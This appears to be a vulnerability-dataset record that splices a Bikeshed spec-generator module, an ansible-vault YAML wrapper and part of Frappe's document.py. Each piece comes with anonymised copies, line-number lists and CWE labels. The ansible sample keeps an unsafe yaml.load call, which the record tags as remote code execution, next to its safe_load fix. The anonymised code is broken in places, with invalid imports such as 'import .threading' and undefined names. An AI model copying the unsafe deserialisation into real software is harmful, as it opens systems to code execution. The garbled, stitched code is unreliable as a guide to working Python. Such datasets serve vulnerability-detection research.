[data-link-type="descriptor"]::after,
[data-link-type="value"]::after,
[data-link-type="function"]::after,
[data-link-type="at-rule"]::after,
[data-link-type="selector"]::after,
[data-link-type="maybe"]::after {
content: "’";
}
[data-link-type].production::before,
[data-link-type].production::after,
.prod [data-link-type]::before,
.prod [data-link-type]::after {
content: "";
}
[data-link-type=element],
[data-link-type=element-attr] {
font-family: Menlo, Consolas, "DejaVu Sans Mono", monospace;
font-size: .9em;
}
[data-link-type=element]::before { content: "<" }
[data-link-type=element]::after { content: ">" }
[data-link-type=biblio] {
white-space: pre;
}"""
VAR_4 = """
:root {
--selflink-VAR_17: white;
--selflink-bg: gray;
--selflink-hover-VAR_17: black;
}
.heading, .issue, .note, .example, li, dt {
position: relative;
}
a.self-link {
position: absolute;
top: 0;
left: calc(-1 * (3.5rem - 26px));
width: calc(3.5rem - 26px);
height: 2em;
VAR_17-align: center;
border: none;
transition: opacity .2s;
opacity: .5;
}
a.self-link:hover {
opacity: 1;
}
.heading > a.self-link {
font-size: 83%;
}
li > a.self-link {
left: calc(-1 * (3.5rem - 26px) - 2em);
}
dfn > a.self-link {
top: auto;
left: auto;
opacity: 0;
width: 1.5em;
height: 1.5em;
background: var(--selflink-bg);
color: var(--selflink-VAR_17);
font-style: normal;
transition: opacity .2s, background-color .2s, color .2s;
}
dfn:hover > a.self-link {
opacity: 1;
}
dfn > a.self-link:hover {
color: var(--selflink-hover-VAR_17);
}
a.self-link::before { content: "¶"; }
.heading > a.self-link::before { content: "§"; }
dfn > a.self-link::before { content: "#"; }
"""
VAR_1 += """
@media (prefers-color-scheme: dark) {
:root {
--selflink-VAR_17: black;
--selflink-bg: silver;
--selflink-hover-VAR_17: white;
}
}
"""
VAR_5 = """
body {
counter-reset: example figure issue;
}
.issue {
counter-increment: issue;
}
.issue:not(.no-marker)::before {
content: "Issue " counter(issue);
}
.example {
counter-increment: example;
}
.example:not(.no-marker)::before {
content: "Example " counter(example);
}
.invalid.example:not(.no-marker)::before,
.illegal.example:not(.no-marker)::before {
content: "Invalid Example" counter(example);
}
figcaption {
counter-increment: figure;
}
figcaption:not(.no-marker)::before {
content: "Figure " counter(figure) " ";
}"""
| import glob
import os
import sys
from collections import defaultdict
from functools import partial as curry
from . import (
biblio,
boilerplate,
caniuse,
conditional,
config,
constants,
datablocks,
dfns,
extensions,
fingerprinting,
h,
headings,
highlight,
idl,
includes,
inlineTags,
lint,
markdown,
mdnspeclinks,
metadata,
shorthands,
wpt,
)
from .func import Functor
from .h import *
from .InputSource import FileInputSource, InputSource
from .messages import *
from .refs import ReferenceManager
from .unsortedJunk import *
class CLASS_0:
def __init__(
self,
VAR_6,
VAR_7=False,
VAR_8=None,
VAR_9=False,
VAR_10=None,
VAR_11=False,
):
self.valid = False
self.lineNumbers = VAR_9
if VAR_9:
constants.dryRun = True
if VAR_6 is None:
VAR_6 = FUNC_0()
if VAR_6 is None: # still
die(
"No input file specified, and no *.bs or *.src.html files found in current directory.\nPlease specify an input file, or use - to pipe from STDIN."
)
return
self.inputSource = InputSource(VAR_6, chroot=constants.chroot)
self.transitiveDependencies = set()
self.debug = VAR_7
self.token = VAR_8
self.testing = VAR_11
if VAR_10 is None:
self.dataFile = config.defaultRequester
else:
self.dataFile = VAR_10
self.md = None
self.mdBaseline = None
self.mdDocument = None
self.mdCommandLine = None
self.mdDefaults = None
self.mdOverridingDefaults = None
self.lines = []
self.document = None
self.html = None
self.head = None
self.body = None
self.fillContainers = None
self.valid = self.initializeState()
def FUNC_1(self):
self.normativeRefs = {}
self.informativeRefs = {}
self.refs = ReferenceManager(VAR_10=self.dataFile, VAR_11=self.testing)
self.externalRefsUsed = defaultdict(lambda: defaultdict(dict))
self.md = None
self.mdBaseline = metadata.MetadataManager()
self.mdDocument = None
self.mdCommandLine = metadata.MetadataManager()
self.mdDefaults = None
self.mdOverridingDefaults = None
self.biblios = {}
self.typeExpansions = {}
self.macros = defaultdict(lambda x: "???")
self.canIUse = {}
self.mdnSpecLinks = {}
self.widl = idl.getParser()
self.testSuites = json.loads(self.dataFile.fetch("test-suites.json", str=True))
self.languages = json.loads(self.dataFile.fetch("languages.json", str=True))
self.extraStyles = defaultdict(str)
self.extraStyles["style-colors"] = VAR_0
self.extraStyles["style-darkmode"] = VAR_1
self.extraStyles["style-md-lists"] = VAR_2
self.extraStyles["style-autolinks"] = VAR_3
self.extraStyles["style-selflinks"] = VAR_4
self.extraStyles["style-counters"] = VAR_5
self.extraScripts = defaultdict(str)
try:
VAR_31 = self.inputSource.read()
self.lines = VAR_31.lines
if VAR_31.date is not None:
self.mdBaseline.addParsedData("Date", VAR_31.date)
except FileNotFoundError:
die(
"Couldn't find the input file at the specified location '{0}'.",
self.inputSource,
)
return False
except OSError:
die("Couldn't open the input file '{0}'.", self.inputSource)
return False
return True
def FUNC_2(self, *VAR_12):
self.transitiveDependencies.update(VAR_12)
def FUNC_3(self):
self.transitiveDependencies.clear()
self.assembleDocument()
self.processDocument()
def FUNC_4(self):
stripBOM(self)
if self.lineNumbers:
self.lines = hackyLineNumbers(self.lines)
self.lines = markdown.stripComments(self.lines)
self.recordDependencies(self.inputSource)
self.lines, self.mdDocument = metadata.parse(lines=self.lines)
self.md = metadata.join(self.mdBaseline, self.mdDocument, self.mdCommandLine)
self.mdDefaults = metadata.fromJson(
data=config.retrieveBoilerplateFile(self, "defaults", error=True),
source="defaults",
)
self.md = metadata.join(
self.mdBaseline, self.mdDefaults, self.mdDocument, self.mdCommandLine
)
self.md.fillTextMacros(self.macros, doc=self)
VAR_22 = {k: json.dumps(v)[1:-1] for k, v in self.macros.items()}
VAR_23 = replaceMacros(
config.retrieveBoilerplateFile(self, "computed-metadata", error=True),
VAR_29=VAR_22,
)
self.mdOverridingDefaults = metadata.fromJson(
data=VAR_23, source="computed-metadata"
)
self.md = metadata.join(
self.mdBaseline,
self.mdDefaults,
self.mdOverridingDefaults,
self.mdDocument,
self.mdCommandLine,
)
self.md.computeImplicitMetadata(doc=self)
self.md.fillTextMacros(self.macros, doc=self)
self.md.validate()
extensions.load(self)
self.refs.initializeRefs(self)
self.refs.initializeBiblio()
self.lines = datablocks.transformDataBlocks(self, self.lines)
self.lines = markdown.parse(
self.lines,
self.md.indent,
opaqueElements=self.md.opaqueElements,
blockElements=self.md.blockElements,
)
self.refs.setSpecData(self.md)
self.html = "".join(line.text for line in self.lines)
boilerplate.addHeaderFooter(self)
self.html = self.fixText(self.html)
self.document = parseDocument(self.html)
self.head = find("head", self)
self.body = find("body", self)
correctH1(self)
includes.processInclusions(self)
metadata.parseDoc(self)
def FUNC_5(self):
conditional.processConditionals(self)
self.fillContainers = locateFillContainers(self)
lint.exampleIDs(self)
boilerplate.addBikeshedVersion(self)
boilerplate.addCanonicalURL(self)
boilerplate.addFavicon(self)
boilerplate.addSpecVersion(self)
boilerplate.addStatusSection(self)
boilerplate.addLogo(self)
boilerplate.addCopyright(self)
boilerplate.addSpecMetadataSection(self)
boilerplate.addAbstract(self)
boilerplate.addExpiryNotice(self)
boilerplate.addObsoletionNotice(self)
boilerplate.addAtRisk(self)
addNoteHeaders(self)
boilerplate.removeUnwantedBoilerplate(self)
wpt.processWptElements(self)
shorthands.run(self)
inlineTags.processTags(self)
canonicalizeShortcuts(self)
addImplicitAlgorithms(self)
fixManualDefTables(self)
headings.processHeadings(self)
checkVarHygiene(self)
processIssuesAndExamples(self)
idl.markupIDL(self)
inlineRemoteIssues(self)
addImageSize(self)
processBiblioLinks(self)
processDfns(self)
idl.processIDL(self)
dfns.annotateDfns(self)
formatArgumentdefTables(self)
formatElementdefTables(self)
processAutolinks(self)
biblio.dedupBiblioReferences(self)
verifyUsageOfAllLocalBiblios(self)
caniuse.addCanIUsePanels(self)
boilerplate.addIndexSection(self)
boilerplate.addExplicitIndexes(self)
boilerplate.addStyles(self)
boilerplate.addReferencesSection(self)
boilerplate.addPropertyIndex(self)
boilerplate.addIDLSection(self)
boilerplate.addIssuesSection(self)
boilerplate.addCustomBoilerplate(self)
headings.processHeadings(self, "all") # again
boilerplate.removeUnwantedBoilerplate(self)
boilerplate.addTOCSection(self)
addSelfLinks(self)
processAutolinks(self)
boilerplate.addAnnotations(self)
boilerplate.removeUnwantedBoilerplate(self)
mdnspeclinks.addMdnPanels(self)
highlight.addSyntaxHighlighting(self)
boilerplate.addBikeshedBoilerplate(self)
fingerprinting.addTrackingVector(self)
fixIntraDocumentReferences(self)
fixInterDocumentReferences(self)
removeMultipleLinks(self)
forceCrossorigin(self)
lint.brokenLinks(self)
lint.accidental2119(self)
lint.missingExposed(self)
lint.requiredIDs(self)
lint.unusedInternalDfns(self)
cleanupHTML(self)
if self.md.prepTR:
for VAR_19 in findAll("[rel ~= 'icon']", self):
removeNode(VAR_19)
for VAR_19 in findAll("link", self):
if VAR_19.get("href").startswith("https://www.w3.org/StyleSheets/TR"):
appendChild(find("head", self), VAR_19)
for VAR_19 in findAll("a", self):
VAR_35 = VAR_19.get("href", "")
if VAR_35.startswith("http://www.w3.org") or VAR_35.startswith(
"http://lists.w3.org"
):
VAR_19.set("href", "https" + VAR_35[4:])
VAR_17 = VAR_19.text or ""
if VAR_17.startswith("http://www.w3.org") or VAR_17.startswith(
"http://lists.w3.org"
):
VAR_19.text = "https" + VAR_17[4:]
extensions.BSPrepTR(self) # pylint: disable=no-member
return self
def FUNC_6(self):
try:
VAR_24 = h.Serializer(
self.md.opaqueElements, self.md.blockElements
).serialize(self.document)
except Exception as e:
die("{0}", e)
return
VAR_24 = finalHackyCleanup(VAR_24)
return VAR_24
def FUNC_7(self, VAR_13):
if VAR_13 is None:
if not isinstance(self.inputSource, FileInputSource):
VAR_13 = "-"
elif self.inputSource.sourceName.endswith(".bs"):
VAR_13 = self.inputSource.sourceName[0:-3] + ".html"
elif self.inputSource.sourceName.endswith(".src.html"):
VAR_13 = self.inputSource.sourceName[0:-9] + ".html"
else:
VAR_13 = "-"
return VAR_13
def FUNC_8(self, VAR_13=None, VAR_14=None):
self.printResultMessage()
VAR_13 = self.fixMissingOutputFilename(VAR_13)
VAR_24 = self.serialize()
if not constants.dryRun:
try:
if VAR_13 == "-":
sys.stdout.write(VAR_24)
else:
with open(
VAR_13, "w", encoding="utf-8", VAR_14=newline
) as f:
f.write(VAR_24)
except Exception as e:
die(
"Something prevented me from saving the output document to {0}:\n{1}",
VAR_13,
e,
)
def FUNC_9(self):
VAR_25 = messageCounts["fatal"]
VAR_26 = messageCounts["linkerror"]
VAR_27 = messageCounts["warning"]
if self.lineNumbers:
warn("Because --line-numbers was used, no output was saved.")
if VAR_25:
success("Successfully generated, but fatal errors were suppressed")
return
if VAR_26:
success("Successfully generated, with {0} linking errors", VAR_26)
return
if VAR_27:
success("Successfully generated, with warnings")
return
def FUNC_10(self, VAR_13, VAR_15=None, VAR_16=False):
import time
VAR_13 = self.fixMissingOutputFilename(VAR_13)
if self.inputSource.mtime() is None:
die(f"Watch mode doesn't support {self.inputSource}")
if VAR_13 == "-":
die("Watch mode doesn't support streaming to STDOUT.")
return
if VAR_15:
import http.server
import socketserver
import .threading
class CLASS_1(http.server.SimpleHTTPRequestHandler):
def FUNC_14(self, VAR_36, *VAR_37):
pass
socketserver.TCPServer.allow_reuse_address = True
VAR_32 = socketserver.TCPServer(
("localhost" if VAR_16 else "", VAR_15), CLASS_1
)
print(f"Serving at VAR_15 {port}")
VAR_33 = threading.Thread(target=VAR_32.serve_forever)
VAR_33.daemon = True
VAR_33.start()
else:
VAR_32 = None
VAR_28 = self.mdCommandLine
try:
self.preprocess()
self.finish(VAR_13)
VAR_34 = {
dep: dep.mtime() for dep in self.transitiveDependencies
}
p("==============DONE==============")
try:
while True:
if any(
input.mtime() != lastModified
for input, lastModified in VAR_34.items()
):
resetSeenMessages()
p("Source file modified. Rebuilding...")
self.initializeState()
self.mdCommandLine = VAR_28
self.preprocess()
self.finish(VAR_13)
VAR_34 = {
dep: dep.mtime() for dep in self.transitiveDependencies
}
p("==============DONE==============")
time.sleep(1)
except KeyboardInterrupt:
p("Exiting~")
if VAR_32:
server.shutdown()
VAR_33.join()
sys.exit(0)
except Exception as e:
die("Something went wrong while watching the file:\n{0}", e)
def FUNC_11(self, VAR_17, VAR_18={}):
if "markdown" in self.md.markupShorthands:
VAR_30 = MarkdownCodeSpans(VAR_17)
else:
VAR_30 = Functor(VAR_17)
VAR_29 = dict(self.macros, **VAR_18)
VAR_30 = VAR_30.map(curry(replaceMacros, VAR_29=macros))
VAR_30 = VAR_30.map(fixTypography)
if "css" in self.md.markupShorthands:
VAR_30 = VAR_30.map(replaceAwkwardCSSShorthands)
return VAR_30.extract()
def FUNC_12(self):
p("Exported terms:")
for VAR_19 in findAll("[data-export]", self):
for term in config.linkTextsFromElement(VAR_19):
p(" " + term)
p("Unexported terms:")
for VAR_19 in findAll("[data-noexport]", self):
for term in config.linkTextsFromElement(VAR_19):
p(" " + term)
def FUNC_13(self, VAR_19):
if VAR_19.tag in self.md.opaqueElements:
return True
if VAR_19.get("data-opaque") is not None:
return True
return False
def FUNC_0():
if os.path.isfile("index.bs"):
return "index.bs"
if os.path.isfile("Overview.bs"):
return "Overview.bs"
VAR_20 = glob.glob("*.bs")
if VAR_20:
return VAR_20[0]
VAR_21 = glob.glob("*.src.html")
if VAR_21:
return VAR_21[0]
return None
constants.specClass = CLASS_0
VAR_0 = """
/* Any --*-VAR_17 not paired with a --*-bg is assumed to have a transparent bg */
:root {
color-scheme: light dark;
--VAR_17: black;
--bg: white;
--unofficial-watermark: url(https://www.w3.org/StyleSheets/TR/2016/logos/UD-watermark);
--logo-bg: #1a5e9a;
--logo-active-bg: #c00;
--logo-VAR_17: white;
--tocnav-normal-VAR_17: #707070;
--tocnav-normal-bg: var(--bg);
--tocnav-hover-VAR_17: var(--tocnav-normal-VAR_17);
--tocnav-hover-bg: #f8f8f8;
--tocnav-active-VAR_17: #c00;
--tocnav-active-bg: var(--tocnav-normal-bg);
--tocsidebar-VAR_17: var(--VAR_17);
--tocsidebar-bg: #f7f8f9;
--tocsidebar-shadow: rgba(0,0,0,.1);
--tocsidebar-heading-VAR_17: hsla(203,20%,40%,.7);
--toclink-VAR_17: var(--VAR_17);
--toclink-underline: #3980b5;
--toclink-visited-VAR_17: var(--toclink-VAR_17);
--toclink-visited-underline: #054572;
--heading-VAR_17: #005a9c;
--hr-VAR_17: var(--VAR_17);
--algo-border: #def;
--del-VAR_17: red;
--del-bg: transparent;
--ins-VAR_17: #080;
--ins-bg: transparent;
--a-normal-VAR_17: #034575;
--a-normal-underline: #bbb;
--a-visited-VAR_17: var(--a-normal-VAR_17);
--a-visited-underline: #707070;
--a-hover-bg: rgba(75%, 75%, 75%, .25);
--a-active-VAR_17: #c00;
--a-active-underline: #c00;
--blockquote-border: silver;
--blockquote-bg: transparent;
--blockquote-VAR_17: currentcolor;
--issue-border: #e05252;
--issue-bg: #fbe9e9;
--issue-VAR_17: var(--VAR_17);
--issueheading-VAR_17: #831616;
--example-border: #e0cb52;
--example-bg: #fcfaee;
--example-VAR_17: var(--VAR_17);
--exampleheading-VAR_17: #574b0f;
--note-border: #52e052;
--note-bg: #e9fbe9;
--note-VAR_17: var(--VAR_17);
--noteheading-VAR_17: hsl(120, 70%, 30%);
--notesummary-underline: silver;
--assertion-border: #aaa;
--assertion-bg: #eee;
--assertion-VAR_17: black;
--advisement-border: orange;
--advisement-bg: #fec;
--advisement-VAR_17: var(--VAR_17);
--advisementheading-VAR_17: #b35f00;
--warning-border: red;
--warning-bg: hsla(40,100%,50%,0.95);
--warning-VAR_17: var(--VAR_17);
--amendment-border: #330099;
--amendment-bg: #F5F0FF;
--amendment-VAR_17: var(--VAR_17);
--amendmentheading-VAR_17: #220066;
--def-border: #8ccbf2;
--def-bg: #def;
--def-VAR_17: var(--VAR_17);
--defrow-border: #bbd7e9;
--datacell-border: silver;
--indexinfo-VAR_17: #707070;
--indextable-hover-VAR_17: black;
--indextable-hover-bg: #f7f8f9;
--outdatedspec-bg: rgba(0, 0, 0, .5);
--outdatedspec-VAR_17: black;
--outdated-bg: maroon;
--outdated-VAR_17: white;
--outdated-shadow: red;
--editedrec-bg: darkorange;
}"""
VAR_1 = """
@media (prefers-color-scheme: dark) {
:root {
--VAR_17: #ddd;
--bg: black;
--unofficial-watermark: url("data:image/svg+xml,%3Csvg xmlns='http://www.w3.org/2000/svg' width='400' height='400'%3E%3Cg fill='%23100808' transform='translate(200 200) rotate(-45) translate(-200 -200)' stroke='%23100808' stroke-width='3'%3E%3Ctext x='50%25' y='220' style='font: bold 70px sans-serif; VAR_17-anchor: middle; letter-spacing: 6px;'%3EUNOFFICIAL%3C/VAR_17%3E%3Ctext x='50%25' y='305' style='font: bold 70px sans-serif; VAR_17-anchor: middle; letter-spacing: 6px;'%3EDRAFT%3C/VAR_17%3E%3C/g%3E%3C/svg%3E");
--logo-bg: #1a5e9a;
--logo-active-bg: #c00;
--logo-VAR_17: white;
--tocnav-normal-VAR_17: #999;
--tocnav-normal-bg: var(--bg);
--tocnav-hover-VAR_17: var(--tocnav-normal-VAR_17);
--tocnav-hover-bg: #080808;
--tocnav-active-VAR_17: #f44;
--tocnav-active-bg: var(--tocnav-normal-bg);
--tocsidebar-VAR_17: var(--VAR_17);
--tocsidebar-bg: #080808;
--tocsidebar-shadow: rgba(255,255,255,.1);
--tocsidebar-heading-VAR_17: hsla(203,20%,40%,.7);
--toclink-VAR_17: var(--VAR_17);
--toclink-underline: #6af;
--toclink-visited-VAR_17: var(--toclink-VAR_17);
--toclink-visited-underline: #054572;
--heading-VAR_17: #8af;
--hr-VAR_17: var(--VAR_17);
--algo-border: #456;
--del-VAR_17: #f44;
--del-bg: transparent;
--ins-VAR_17: #4a4;
--ins-bg: transparent;
--a-normal-VAR_17: #6af;
--a-normal-underline: #555;
--a-visited-VAR_17: var(--a-normal-VAR_17);
--a-visited-underline: var(--a-normal-underline);
--a-hover-bg: rgba(25%, 25%, 25%, .2);
--a-active-VAR_17: #f44;
--a-active-underline: var(--a-active-VAR_17);
--borderedblock-bg: rgba(255, 255, 255, .05);
--blockquote-border: silver;
--blockquote-bg: var(--borderedblock-bg);
--blockquote-VAR_17: currentcolor;
--issue-border: #e05252;
--issue-bg: var(--borderedblock-bg);
--issue-VAR_17: var(--VAR_17);
--issueheading-VAR_17: hsl(0deg, 70%, 70%);
--example-border: hsl(50deg, 90%, 60%);
--example-bg: var(--borderedblock-bg);
--example-VAR_17: var(--VAR_17);
--exampleheading-VAR_17: hsl(50deg, 70%, 70%);
--note-border: hsl(120deg, 100%, 35%);
--note-bg: var(--borderedblock-bg);
--note-VAR_17: var(--VAR_17);
--noteheading-VAR_17: hsl(120, 70%, 70%);
--notesummary-underline: silver;
--assertion-border: #444;
--assertion-bg: var(--borderedblock-bg);
--assertion-VAR_17: var(--VAR_17);
--advisement-border: orange;
--advisement-bg: #222218;
--advisement-VAR_17: var(--VAR_17);
--advisementheading-VAR_17: #f84;
--warning-border: red;
--warning-bg: hsla(40,100%,20%,0.95);
--warning-VAR_17: var(--VAR_17);
--amendment-border: #330099;
--amendment-bg: #080010;
--amendment-VAR_17: var(--VAR_17);
--amendmentheading-VAR_17: #cc00ff;
--def-border: #8ccbf2;
--def-bg: #080818;
--def-VAR_17: var(--VAR_17);
--defrow-border: #136;
--datacell-border: silver;
--indexinfo-VAR_17: #aaa;
--indextable-hover-VAR_17: var(--VAR_17);
--indextable-hover-bg: #181818;
--outdatedspec-bg: rgba(255, 255, 255, .5);
--outdatedspec-VAR_17: black;
--outdated-bg: maroon;
--outdated-VAR_17: white;
--outdated-shadow: red;
--editedrec-bg: darkorange;
}
/* In case a transparent-bg image doesn't expect to be on a dark bg,
which is quite common in practice... */
img { background: white; }
}"""
VAR_2 = """
/* This is a weird hack for me not yet following the commonmark spec
regarding paragraph and lists. */
[data-md] > :first-child {
margin-top: 0;
}
[data-md] > :last-child {
margin-bottom: 0;
}"""
VAR_3 = """
.css.css, .property.property, .descriptor.descriptor {
color: var(--a-normal-VAR_17);
font-size: inherit;
font-family: inherit;
}
.css::before, .property::before, .descriptor::before {
content: "‘";
}
.css::after, .property::after, .descriptor::after {
content: "’";
}
.property, .descriptor {
/* Don't wrap property and descriptor names */
white-space: nowrap;
}
.type { /* CSS value <type> */
font-style: italic;
}
pre .property::before, pre .property::after {
content: "";
}
[data-link-type="property"]::before,
[data-link-type="propdesc"]::before,
[data-link-type="descriptor"]::before,
[data-link-type="value"]::before,
[data-link-type="function"]::before,
[data-link-type="at-rule"]::before,
[data-link-type="selector"]::before,
[data-link-type="maybe"]::before {
content: "‘";
}
[data-link-type="property"]::after,
[data-link-type="propdesc"]::after,
[data-link-type="descriptor"]::after,
[data-link-type="value"]::after,
[data-link-type="function"]::after,
[data-link-type="at-rule"]::after,
[data-link-type="selector"]::after,
[data-link-type="maybe"]::after {
content: "’";
}
[data-link-type].production::before,
[data-link-type].production::after,
.prod [data-link-type]::before,
.prod [data-link-type]::after {
content: "";
}
[data-link-type=element],
[data-link-type=element-attr] {
font-family: Menlo, Consolas, "DejaVu Sans Mono", monospace;
font-size: .9em;
}
[data-link-type=element]::before { content: "<" }
[data-link-type=element]::after { content: ">" }
[data-link-type=biblio] {
white-space: pre;
}"""
VAR_4 = """
:root {
--selflink-VAR_17: white;
--selflink-bg: gray;
--selflink-hover-VAR_17: black;
}
.heading, .issue, .note, .example, li, dt {
position: relative;
}
a.self-link {
position: absolute;
top: 0;
left: calc(-1 * (3.5rem - 26px));
width: calc(3.5rem - 26px);
height: 2em;
VAR_17-align: center;
border: none;
transition: opacity .2s;
opacity: .5;
}
a.self-link:hover {
opacity: 1;
}
.heading > a.self-link {
font-size: 83%;
}
li > a.self-link {
left: calc(-1 * (3.5rem - 26px) - 2em);
}
dfn > a.self-link {
top: auto;
left: auto;
opacity: 0;
width: 1.5em;
height: 1.5em;
background: var(--selflink-bg);
color: var(--selflink-VAR_17);
font-style: normal;
transition: opacity .2s, background-color .2s, color .2s;
}
dfn:hover > a.self-link {
opacity: 1;
}
dfn > a.self-link:hover {
color: var(--selflink-hover-VAR_17);
}
a.self-link::before { content: "¶"; }
.heading > a.self-link::before { content: "§"; }
dfn > a.self-link::before { content: "#"; }
"""
VAR_1 += """
@media (prefers-color-scheme: dark) {
:root {
--selflink-VAR_17: black;
--selflink-bg: silver;
--selflink-hover-VAR_17: white;
}
}
"""
VAR_5 = """
body {
counter-reset: example figure issue;
}
.issue {
counter-increment: issue;
}
.issue:not(.no-marker)::before {
content: "Issue " counter(issue);
}
.example {
counter-increment: example;
}
.example:not(.no-marker)::before {
content: "Example " counter(example);
}
.invalid.example:not(.no-marker)::before,
.illegal.example:not(.no-marker)::before {
content: "Invalid Example" counter(example);
}
figcaption {
counter-increment: figure;
}
figcaption:not(.no-marker)::before {
content: "Figure " counter(figure) " ";
}"""
| [
6,
37,
38,
52,
70,
84,
112,
127,
129,
132,
137,
139,
145,
147,
149,
157,
174,
176,
180,
181,
184,
185,
193,
194,
196,
197,
201,
202,
209,
211,
241,
242,
268,
282,
283,
286,
289,
293,
305,
307,
309,
320,
323,
333,
353,
355,
370,
373,
380,
382,
386,
390,
395,
402,
404,
414,
415,
416,
440,
442,
443,
444,
445,
446,
451,
457,
459,
469,
476,
477,
488,
493,
497,
501,
503,
504,
506,
511,
514,
516,
520,
527,
532,
537,
539,
541,
543,
548,
556,
560,
565,
570,
576,
580,
585,
589,
594,
599,
601,
603,
606,
612,
615,
621,
623,
627,
634,
639,
644,
646,
648,
650,
655,
663,
665,
669,
674,
679,
685,
689,
694,
698,
703,
708,
710,
712,
715,
721,
728,
738,
781,
788,
796,
800,
847,
861,
862,
873,
884,
891,
479,
480,
481,
482,
483,
484,
485,
486,
487
] | [
6,
37,
38,
52,
70,
84,
112,
127,
129,
132,
137,
139,
145,
147,
149,
157,
174,
176,
180,
181,
184,
185,
193,
194,
196,
197,
201,
202,
209,
211,
241,
242,
268,
282,
283,
286,
289,
293,
305,
307,
309,
320,
323,
333,
353,
355,
370,
373,
380,
382,
386,
390,
395,
402,
404,
414,
415,
416,
440,
442,
443,
444,
445,
446,
451,
457,
459,
469,
476,
477,
488,
493,
497,
501,
503,
504,
506,
511,
514,
516,
520,
527,
532,
537,
539,
541,
543,
548,
556,
560,
565,
570,
576,
580,
585,
589,
594,
599,
601,
603,
606,
612,
615,
621,
623,
627,
634,
639,
644,
646,
648,
650,
655,
663,
665,
669,
674,
679,
685,
689,
694,
698,
703,
708,
710,
712,
715,
721,
728,
738,
781,
788,
796,
800,
847,
861,
862,
873,
884,
891,
479,
480,
481,
482,
483,
484,
485,
486,
487
] |
5CWE-94
| import yaml
try:
from ansible.utils.vault import VaultLib
except ImportError:
# Ansible 2.0 has changed the vault location
from ansible.parsing.vault import VaultLib
class Vault(object):
'''R/W an ansible-vault yaml file'''
def __init__(self, password):
self.password = password
self.vault = VaultLib(password)
def load(self, stream):
'''read vault steam and return python object'''
return yaml.load(self.vault.decrypt(stream))
def dump(self, data, stream=None):
'''encrypt data and print stdout or write to stream'''
yaml_text = yaml.dump(
data,
default_flow_style=False,
allow_unicode=True)
encrypted = self.vault.encrypt(yaml_text)
if stream:
stream.write(encrypted)
else:
return encrypted
| import yaml
try:
from ansible.utils.vault import VaultLib
except ImportError:
# Ansible 2.0 has changed the vault location
from ansible.parsing.vault import VaultLib
class Vault(object):
'''R/W an ansible-vault yaml file'''
def __init__(self, password):
self.password = password
self.vault = VaultLib(password)
def load(self, stream):
'''read vault steam and return python object'''
return yaml.safe_load(self.vault.decrypt(stream))
def dump(self, data, stream=None):
'''encrypt data and print stdout or write to stream'''
yaml_text = yaml.dump(
data,
default_flow_style=False,
allow_unicode=True)
encrypted = self.vault.encrypt(yaml_text)
if stream:
stream.write(encrypted)
else:
return encrypted
| remote_code_execution | {
"code": [
" return yaml.load(self.vault.decrypt(stream))"
],
"line_no": [
18
]
} | {
"code": [
" return yaml.safe_load(self.vault.decrypt(stream))"
],
"line_no": [
18
]
} | import yaml
try:
from ansible.utils.vault import .VaultLib
except ImportError:
from ansible.parsing.vault import .VaultLib
class CLASS_0(object):
def __init__(self, VAR_0):
self.password = VAR_0
self.vault = VaultLib(VAR_0)
def FUNC_0(self, VAR_1):
return yaml.load(self.vault.decrypt(VAR_1))
def FUNC_1(self, VAR_2, VAR_1=None):
VAR_3 = yaml.dump(
VAR_2,
default_flow_style=False,
allow_unicode=True)
VAR_4 = self.vault.encrypt(VAR_3)
if VAR_1:
stream.write(VAR_4)
else:
return VAR_4
| import yaml
try:
from ansible.utils.vault import .VaultLib
except ImportError:
from ansible.parsing.vault import .VaultLib
class CLASS_0(object):
def __init__(self, VAR_0):
self.password = VAR_0
self.vault = VaultLib(VAR_0)
def FUNC_0(self, VAR_1):
return yaml.safe_load(self.vault.decrypt(VAR_1))
def FUNC_1(self, VAR_2, VAR_1=None):
VAR_3 = yaml.dump(
VAR_2,
default_flow_style=False,
allow_unicode=True)
VAR_4 = self.vault.encrypt(VAR_3)
if VAR_1:
stream.write(VAR_4)
else:
return VAR_4
| [
5,
7,
8,
11,
15,
19,
31,
10,
17,
21
] | [
5,
7,
8,
11,
15,
19,
31,
10,
17,
21
] |
1CWE-79
| # Copyright (c) 2015, Frappe Technologies Pvt. Ltd. and Contributors
# MIT License. See license.txt
from __future__ import unicode_literals, print_function
import frappe
import time
from frappe import _, msgprint
from frappe.utils import flt, cstr, now, get_datetime_str, file_lock, date_diff
from frappe.model.base_document import BaseDocument, get_controller
from frappe.model.naming import set_new_name
from six import iteritems, string_types
from werkzeug.exceptions import NotFound, Forbidden
import hashlib, json
from frappe.model import optional_fields, table_fields
from frappe.model.workflow import validate_workflow
from frappe.model.workflow import set_workflow_state_on_action
from frappe.utils.global_search import update_global_search
from frappe.integrations.doctype.webhook import run_webhooks
from frappe.desk.form.document_follow import follow_document
from frappe.core.doctype.server_script.server_script_utils import run_server_script_for_doc_event
# once_only validation
# methods
def get_doc(*args, **kwargs):
"""returns a frappe.model.Document object.
:param arg1: Document dict or DocType name.
:param arg2: [optional] document name.
:param for_update: [optional] select document for update.
There are multiple ways to call `get_doc`
# will fetch the latest user object (with child table) from the database
user = get_doc("User", "test@example.com")
# create a new object
user = get_doc({
"doctype":"User"
"email_id": "test@example.com",
"roles: [
{"role": "System Manager"}
]
})
# create new object with keyword arguments
user = get_doc(doctype='User', email_id='test@example.com')
# select a document for update
user = get_doc("User", "test@example.com", for_update=True)
"""
if args:
if isinstance(args[0], BaseDocument):
# already a document
return args[0]
elif isinstance(args[0], string_types):
doctype = args[0]
elif isinstance(args[0], dict):
# passed a dict
kwargs = args[0]
else:
raise ValueError('First non keyword argument must be a string or dict')
if len(args) < 2 and kwargs:
if 'doctype' in kwargs:
doctype = kwargs['doctype']
else:
raise ValueError('"doctype" is a required key')
controller = get_controller(doctype)
if controller:
return controller(*args, **kwargs)
raise ImportError(doctype)
class Document(BaseDocument):
"""All controllers inherit from `Document`."""
def __init__(self, *args, **kwargs):
"""Constructor.
:param arg1: DocType name as string or document **dict**
:param arg2: Document name, if `arg1` is DocType name.
If DocType name and document name are passed, the object will load
all values (including child documents) from the database.
"""
self.doctype = self.name = None
self._default_new_docs = {}
self.flags = frappe._dict()
if args and args[0] and isinstance(args[0], string_types):
# first arugment is doctype
if len(args)==1:
# single
self.doctype = self.name = args[0]
else:
self.doctype = args[0]
if isinstance(args[1], dict):
# filter
self.name = frappe.db.get_value(args[0], args[1], "name")
if self.name is None:
frappe.throw(_("{0} {1} not found").format(_(args[0]), args[1]),
frappe.DoesNotExistError)
else:
self.name = args[1]
if 'for_update' in kwargs:
self.flags.for_update = kwargs.get('for_update')
self.load_from_db()
return
if args and args[0] and isinstance(args[0], dict):
